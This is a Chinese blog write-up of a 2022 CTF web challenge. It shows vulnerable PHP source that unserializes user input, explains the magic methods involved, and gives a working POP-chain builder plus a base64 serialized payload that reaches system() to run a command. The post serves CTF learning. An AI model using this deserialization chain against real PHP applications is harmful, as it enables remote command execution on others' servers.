2022北京工业互联网安全大赛初赛-wakeup

已于 2022-09-29 10:05:36 修改
阅读量1.0k 收藏 5
点赞数 4
分类专栏: CTF WEB 文章标签: php 开发语言
于 2022-09-28 12:59:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52585514/article/details/127087385
版权
  • 使用引用&来给变量赋值
  • php反序列化

这道题打的时候没做出来,赛后看了别人的wp,看到是用引用来赋值,就自己复现出来了。

源码

<?php

class KeyPort {

    public function __call($name, $arguments)
    {
        if(!isset($this->wakeup)||!$this->wakeup){
            call_user_func_array($this->format[$name],$arguments);
        }
    }

    public function finish(){
        $this->format=array();
        return $this->finish->iffinish;
    }

    public function __wakeup(){
        $this->wakeup=True;
    }
}

class ArrayObj{

    private $iffinish;
    public $name;

    public function __get($name){
        return $this->$name=$this->name[$name];
    }
}

class SunCorpa {
    public function __destruct()
    {
        if ($this->process->finish()) {
            $this->process->forward($this->_forward);
        }
    }
}

class MoonCorpa {
    public function __destruct()
    {
        if ($this->process->finish()) {
            $this->options['new']->forward($this->_forward);
        }
    }
    public function __wakeup(){
    }
}

if($_GET['u']){
    unserialize(base64_decode($_GET['u']));
}else{
    highlight_file(__FILE__);
}

首先要先了解一点基本知识

基本知识

1.魔法函数__destruct()、__wakeup()

__destruct

拥有这个的类的对象在反序列化时,会先执行此对象的__destruct再执行此对象的成员属性的值的__destruct

即先执行外层再执行内层

__wakeup

拥有这个的类的对象在反序列化时,会先执行对象的成员属性的值的__wakeup再执行此对象的__wakeup

即先执行内层再执行外层

eg:

class A{
    public $c;
    public function __destruct(){
        echo 'A',PHP_EOL;
    }
    public function __wakeup(){
        echo 'a',PHP_EOL;
    }
}
class SampleClass {
    public $a;
    public function __destruct(){
        echo 'S',PHP_EOL;
    }
    public function __wakeup(){
        echo 's',PHP_EOL;
    }

}
//$a=new SampleClass();
//$a->a=new A;
$a='O:11:"SampleClass":1:{s:1:"a";O:1:"A":1:{s:1:"c";N;}}';
unserialize($a);

输出

a
s
S
A
2.php引用&赋值

在php中可以使用引用的方式来让两个变量名指向同一个内存地址,这样在对一个变量进行操作的时候,另一个变量的值也会变

在函数中使用引用参数来修改传入参数的值

eg:

function test (&$a){
    $x=&$a;
    $x='123';
}
$x='11';
test($x);
echo $x;

输出

123

可以看见,函数外部的变量值也发生了改变

3.魔法函数__get、__call

__get

当类的成员属性被设定为 private 后,如果在类外部访问这个成员属性,那么就会触发__get()

访问不存在的成员属性也会触发__get

eg:

class C{
    private $a;
    public function __get($name){
        echo $name;
    }
}
$c=new C;
echo $c->a;
echo $c->b;

输出

ab

__call

PHP5 的对象新增了一个专用方法 __call(),这个方法用来监视一个对象中的其它方法。如果你试着调用一个对象中不存在或被权限控制中的方法,__call 方法将会被自动调用。

<?php  

class foo {  

  function __call($name,$arguments) {  

    print("Did you call me? I'm $name!");  

  }  

} $x = new foo();  

$x->doStuff();  

$x->fancy_stuff();  

?>
//Did you call me? I'm doStuff!Did you call me? I'm fancy_stuff!

代码审计

只看到了call_user_func_array可以利用

image-20220928123436173

关键在于如何进入__call且通过这个判断

if(!isset($this->wakeup)||!$this->wakeup)

要么不给wakeup赋值,要么控制wakeup为false

在反序列化后,会对KeyPort对象的wakeup进行赋值

所以通过引用来在__wakeup执行后还能对wakeup进行赋值

首先观察到有两个类可以执行__destruct

class SunCorpa {
    public function __destruct()
    {
        if ($this->process->finish()) {
            $this->process->forward($this->_forward);
        }
    }
}

class MoonCorpa {
    public function __destruct()
    {
        if ($this->process->finish()) {
            $this->options['new']->forward($this->_forward);
        }
    }
    public function __wakeup(){
    }
}

且都执行$this->process->finish(),只是函数代码不同

可以先让一个返回false,另一个返回正常值

我们选择让SunCorpa的$this->process->finish()返回false

这里使用构造器的方式弄链子,否则有点麻烦

POP

class KeyPort {}
class MoonCorpa {}
class ArrayObj{

    private $iffinish;
    public $name;
    public function __construct(&$a)
    {
        $this->iffinish=&$a;
    }
}

class SunCorpa {

    public function __construct(){
        //第一部分,给wakeup赋值false
        $key=new KeyPort;
        $arr=new ArrayObj($key->wakeup);//使用这个方式让ArrayObj::iffinish引用wakeup,因为在后面会给ArrayObj::iffinish赋值,这样KeyPort::wakeup也会变
        $arr->name=array('iffinish'=>false);
        $this->key=$key;
        $this->arr=$arr;
        $this->process=$this->key;
        $this->key->finish=$arr;
        //第一部分结束,$this->key->wakeup被赋值为false
        //第二部分,因为在执行KetPort::finish()时,其format会被赋值为空数组,导致无法执行我们想要的函数,所以使用引用的方法来给format赋值
        $key2=new KeyPort();
        $moon=new MoonCorpa();//使用这个类的__destruct来进入到KeyPort的__call函数
        $this->moon=$moon;//让MoonCorpa对象成为此对象的成员
        $this->key2=$key2;
        $this->moon->process=$key2;
        $arr2=new ArrayObj($key->format);//让ArrayObj::iffinish引用$key->format
        $key2->finish=$arr2;
        $arr2->name=array('iffinish'=>array('forward'=>'system'));//给$key的format赋值为array('forward'=>'system')
        $this->moon->options=array('new'=>&$this->key);
        $this->moon->_forward='dir';//要执行的命令       
    }
$a=new SunCorpa();
echo base64_encode(serialize($a));
//Tzo4OiJTdW5Db3JwYSI6NTp7czozOiJrZXkiO086NzoiS2V5UG9ydCI6Mzp7czo2OiJ3YWtldXAiO047czo2OiJmaW5pc2giO086ODoiQXJyYXlPYmoiOjI6e3M6MTg6IgBBcnJheU9iagBpZmZpbmlzaCI7UjozO3M6NDoibmFtZSI7YToxOntzOjg6ImlmZmluaXNoIjtiOjA7fX1zOjY6ImZvcm1hdCI7Tjt9czozOiJhcnIiO3I6NDtzOjc6InByb2Nlc3MiO3I6MjtzOjQ6Im1vb24iO086OToiTW9vbkNvcnBhIjozOntzOjc6InByb2Nlc3MiO086NzoiS2V5UG9ydCI6MTp7czo2OiJmaW5pc2giO086ODoiQXJyYXlPYmoiOjI6e3M6MTg6IgBBcnJheU9iagBpZmZpbmlzaCI7Ujo3O3M6NDoibmFtZSI7YToxOntzOjg6ImlmZmluaXNoIjthOjE6e3M6NzoiZm9yd2FyZCI7czo2OiJzeXN0ZW0iO319fX1zOjc6Im9wdGlvbnMiO2E6MTp7czozOiJuZXciO1I6Mjt9czo4OiJfZm9yd2FyZCI7czo0OiJjYWxjIjt9czo0OiJrZXkyIjtyOjExO30=

本地执行

image-20220928125729470

成功了,tmd

v2ish1yan
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
赛博地球杯工业互联网安全大赛wp1
08-03
赛博地球杯工业互联网安全大赛wp1
2023中国工业互联网安全大赛wp
monster663的博客
07-07 2283
2023中国工业互联网安全大赛决赛WP
2022年中国工业互联网安全大赛北京市选拔赛暨全国线上预选赛MISC-工控文件Writeup
末初的CSDN博客
10-03 3115
本来报名了这个比赛的,但是后面给搞忘了,然后比赛完了之后才知道,Web没环境了,简单的来复现下唯一的一道Misc吧。官网没法下的这里(我从官方下的,因为写这篇文章时候忽然发现没法打开下载页面了,贴个我之前从官网下的)一开始以为这只是个标识罢了,没认为这是密码,后面实在没找到别的密码了,就试了下还真是。对于不同的密码可以打开不同的加密卷,提示另一个密码可能是。安装打开会有提醒,但是进去切换平台就可以打开。,猜测可能加密磁盘的密码在别的地方,这是。打开之后经过一番寻找,发现外设的摄像头。的加密磁盘了,但是用。
2023年工业互联网(网络安全)赛题AI解析
renxq097的博客
08-29 3119
第二届全国工业和信息化技术技能大赛 ——网络与信息安全管理员(工业互联网安全方向)赛项实际操作竞赛样题
%3c?php+eval,2020全国工业互联网安全技术技能大赛Web题WP
weixin_30070663的博客
03-23 742
0x00 SimpleCalculator 打开后 发现flag.php可执行数学函数 在网上找到一个原题 https://www.cnblogs.com/20175211lyz/p/11588219.html 可执行shell拿到f0x00 SimpleCalculator打开后,发现flag.php可执行数学函数,在网上找到一个原题:https://www.cnblogs.com/201752...
Jongsimgwan-wakeup
03-27
不过,我们可以从"Jongsimgwan-wakeup-main"这个压缩包子文件的名称来推测,这可能是某个项目的主要代码库或者主程序文件。 在IT行业中,"main"通常指的是程序的入口点,是程序开始执行的地方。如果这是一个软件...
ESP8266-Wakeup-Lamp
03-05
【ESP8266-Wakeup-Lamp】是一个基于ESP8266微控制器的智能唤醒灯项目。ESP8266是一款经济实惠且功能强大的Wi-Fi芯片,常用于物联网(IoT)应用,如智能家居设备。这个项目的目标是创建一个能够模拟日出效果的闹钟,...
GD32F4-PMU-Sleep-Wakeup.rar
最新发布
07-20
GD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep_WakeupGD32F4_PMU_Sleep...
disable-usb-wakeup:禁用某些USB设备从挂起状态唤醒的脚本
03-20
该脚本将它们与配置的列表进行比较,并在匹配时将disabled写入设备的power/wakeup文件。这应该适用于任何Linux系统。 :penguin: 安装 只需将脚本复制到合适的位置,然后将systemd单元复制到system units目录,然后...
2019工业信息安全技能大赛试题
07-30
2019工业信息安全技能大赛的CTF试题,里面存在流量题、加密、隐写、逆向、固件、工控协议、等等
2021CTF工业信息安全大赛第一场题.rar
07-02
2021CTF工业信息安全大赛第一场题.rar
2020全国工业互联网安全技术技能大赛-护网杯-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网杯,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
2020工业控制安全大赛试题.zip
09-12
“中能融合杯”第六届全国工控系统信息安全攻防竞赛于9月12日上午9:00准时开赛,工控系统信息安全攻防竞赛已成功举办5届,前五届赛事分别聚焦能源电力(火电厂、新能源)、城市公用事业领域燃气、水务、应急响应等领域。第六届大赛告别前五届的线下比拼,迈入“线上+线下”并重的赛事2.0时代,初赛采用CTF夺旗形式。除此之外,赛题设计也更具特色,题目总共分为15道,4个关卡:第一关卡为签到题;第二关卡为传统的互联网竞赛题目;第三、四关卡为工业相关技能竞赛题。
PIC24F-Sleep-Wakeup-with-Pin.zip_单片机开发_C/C++_
08-11
标题中的"PIC24F-Sleep-Wakeup-with-Pin.zip"指的是Microchip公司的一款基于PIC24F系列的微控制器的睡眠与唤醒功能的示例程序。PIC24F是Microchip Technology公司推出的16位微控制器,它以其低功耗、高性能和丰富的...
【CTF WriteUp】2020全国工业互联网安全技术技能大赛密码题(Crypto)wp
qq_45603443的博客
10-24 4571
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 护网杯2020wp一、题目 2E二、根据题目给脚本推出EXP如下:1.Task.py2. print(key)3. print(1)4. mt.py得到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/20201024231116648.jpg#pic_center) 一、题目 2E 二、根据题目给脚本推出EXP如下: 1.Task.py 代码如下(示例): import random from
【CTF WriteUp】2020全国工业互联网安全技术技能大赛(原护网杯)Crypto题解
cccchhhh6819的博客
10-25 6909
Crypto signsystem 题目中的加密算法很奇怪,所以测试一下加密算法的结果,得到如下结论: 在不模n的情况下,该函数加密结果满足以下数列: f(1) = m, f(2) = m^2-2, f(n+2) = m*f(n+1) - f(n) 列出几项观察: m, m^2-2, m^3-3m, m^4-4m^2+2, m^5-5m^3+5m, ... 暂时没有得到有用结论。再看一看e和d的关系,随便找了100个输入,确认e和d在该算法可逆,原理不明。 继续看代码。代码允许输入一个明文m计算enc(
2020全国工业互联网安全技术技能大赛Web题WP
李熠专用博客_白帽子一枚,人称低危终结者
10-25 6332
0x00 SimpleCalculator 打开后,发现flag.php可执行数学函数,在网上找到一个原题:https://www.cnblogs.com/20175211lyz/p/11588219.html 可执行shell拿到flag。 payload如下: http://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=\$pi=(is_nan\^(6).(4)).(tan\^(1).(5));\$pi=\$\$pi;\$p
adc按键驱动中的wakeup-event-action
04-07
ADC按键驱动中的wakeup-event-action是指当ADC按键被按下并触发了唤醒事件时,系统执行的操作。这些操作可以包括打开或关闭设备、执行相应的处理函数、发送消息或通知等。具体的wakeup-event-action取决于驱动程序的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值